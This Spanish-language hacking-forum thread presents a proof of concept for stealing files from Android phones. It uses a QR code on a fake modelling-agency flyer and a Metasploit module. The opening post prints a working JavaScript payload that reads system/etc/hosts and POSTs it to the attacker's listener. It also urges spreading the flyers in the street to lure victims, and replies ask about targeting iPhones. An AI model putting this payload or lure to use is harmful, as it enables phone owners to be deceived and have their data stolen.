comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

PoC: Robar archivos de Android con Metasploit

  • 4 Respuestas
  • 4287 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5396
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Febrero 14, 2013, 05:48:14 pm »
Todo lo que veréis a continuación es una prueba de concepto realizada en un entorno controlado en local.

En primer lugar necesitaremos una herramienta que nos genere un código QR, tenéis muchas por Internet. A continuación generaréis un código QR que contenga la dirección IP de la máquina donde dejaréis escuchando metasploit por el puerto 80, en mi caso como estoy en una intranet, la 192.168.1.23.

En segundo lugar deberéis escribir en un folio un texto de gancho (Ingeniería Social en su máximo esplendor), para conseguir que las víctimas piquen el anzuelo, y utilicen su terminal móvil con Android para leer el código QR del folio. En nuestro caso, me he inventado una supuesta agencia de modelos que busca azafatas para un congreso :)

Como dato curioso, algunas aplicaciones móviles que decodifican códigos QR, no preguntan tras leer códigos que contienen una URL, si el usuario desea acceder a ellas realmente, y te redirigen directamente al Sitio Web, este es el caso de la aplicación ScanLife, que facilita aún más nuestra estrategia para conseguir que la victima visite nuestra IP.

A continuación os dejo una imagen con mi documento:


El siguiente paso será montar Metasploit para que quede escuchando en la IP 192.168.1.23 por el puerto 80, con el exploit para Android del que hablábamos. Para ello yo he utilizado una VM con Backtrack 5 R1.

Una vez lanzada la distro, ejecutaremos Metasploit desde una shell:



Ahora cargaremos el módulo de Android con el que lanzaremos el ataque y le indicamos que queremos robar el siguiente archivo del móvil (si queréis lanzar otro tipo de ataque podéis ver las distintas opciones con el comando “show options”:


Indicamos al módulo que queremos que la víctima sea redirigida directamente a la raíz del servidor:


Y al puerto 80 (si no lo modificamos, por defecto está configurado en el 8080):


Ya solo nos falta arrancar el servidor con el exploit y esperar a una víctima:


Ahora toca realizar ingeniería social, repartiendo por las calles el panfleto de nuestra Agencia de Modelos Flu, buscando víctimas a las que robar sus datos.

Yo he sacrificado para la PoC mi HTC Desire, y he escaneado el código QR, en mi caso (como debería de ser en todas las APP que escaneen QR, aunque haya herramientas como ScanLife que se lo pasan por el forro) me preguntó el móvil antes de redireccionarme a la página sobre si quería realmente abrir el Sitio Web.

Tras aceptar la redirección, en el móvil pude ver una página Web totalmente blanca, cuya URL contenía gran cantidad de símbolos alfanuméricos. Me dispuse a editar el contenido del HTML con un editor que tengo en Android, y pude ver el siguiente código:

Código: HTML5
  1. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  2. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  3. <No tienes permisos para ver links. Registrate o Entra con tu cuenta lang=javascript>
  4. var target_files = Array('system/etc/hosts');
  5. var results = new Array();
  6. function addField(form, name, value) {
  7. var hf = document.createElement('input');
  8. hf.setAttribute('type', 'hidden');
  9. hf.setAttribute('name', name);
  10. hf.setAttribute('value', value);
  11. form.appendChild(hf);
  12. }
  13. function uploadFiles(files) {
  14. var form = document.createElement('form');
  15. form.setAttribute('method', 'POST');
  16. form.setAttribute('action', 'http://192.168.1.23:80/q');
  17. var i = 0;
  18. for (var fn in files) {
  19. addField(form, 'f'+i, btoa(fn));
  20. addField(form, 'd'+i, files[fn]);
  21. i += 1;
  22. }
  23. document.body.appendChild(form);
  24. form.submit();
  25. }
  26. for (var fn in target_files) {
  27. fn = target_files[fn];
  28. xh = new XMLHttpRequest();
  29. xh.open('GET', fn, false);
  30. xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
  31. xh.send();
  32. }
  33. uploadFiles(results);
  34. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  35. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  36. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>

Si nos vamos ahora a la consola de Metasploit podremos ver como todo ha funcionado correctamente y ya he logrado obtener la información del móvil:


¿Creo que a partir de ahora os pensaréis dos veces antes de escanear un código QR desde el móvil verdad?

Fuente: Flu-project
« Última modificación: Febrero 14, 2013, 05:52:02 pm por ANTRAX »


Desconectado ricki74

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Febrero 15, 2013, 02:38:34 am »
Hola.a todos,pregunto si esto se puede hacer en local,quiero decir:en vez de escanear el QR hacerlo desde el móvil conectado a la red wifi.El móvil lo tengo roteado(no creo que haga falta).Y se que pone en el enunciado "Android" pero,valdría en un iPhone? Tiene jailbreack (no por mucho tiempo).Muchas gracias y un saludo.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5396
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #2 en: Febrero 15, 2013, 09:11:13 am »
Con android funciona perfecto, con Iphone no te sabria decir bro..


Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #3 en: Febrero 15, 2013, 09:50:22 am »
Llega a ser la misma logica y funcionalidad en Iphone con la diferencia que  las apps de iphone joroban la vida xD por decirlo porque verifican la URL

Regards,
Snifer

No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado ricki74

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Febrero 15, 2013, 10:20:38 am »
Gracias por las respuestas.

 

¿Te gustó el post? COMPARTILO!



Limpia la cache de tu Android con App Cache Cleaner

Iniciado por 54NDR4

Respuestas: 0
Vistas: 1717
Último mensaje Marzo 31, 2013, 10:58:06 pm
por 54NDR4
Android para PC y Mac con "bluestacks"

Iniciado por Only

Respuestas: 1
Vistas: 2213
Último mensaje Diciembre 29, 2012, 09:27:51 pm
por |şSɘŬ
Android sabrá cuándo bloquear y cuándo no tu smartphone

Iniciado por Reina_Mora

Respuestas: 1
Vistas: 1907
Último mensaje Marzo 24, 2015, 08:20:04 am
por k0rs0
Código Fuente de Android 4.0 "Ice Cream Sandwich"

Iniciado por Only

Respuestas: 0
Vistas: 2038
Último mensaje Noviembre 16, 2011, 10:06:38 pm
por Only
Fast For Facebook - Excelente Cliente Facebook para Android

Iniciado por Kodeinfect

Respuestas: 0
Vistas: 1507
Último mensaje Febrero 03, 2013, 04:58:14 pm
por Kodeinfect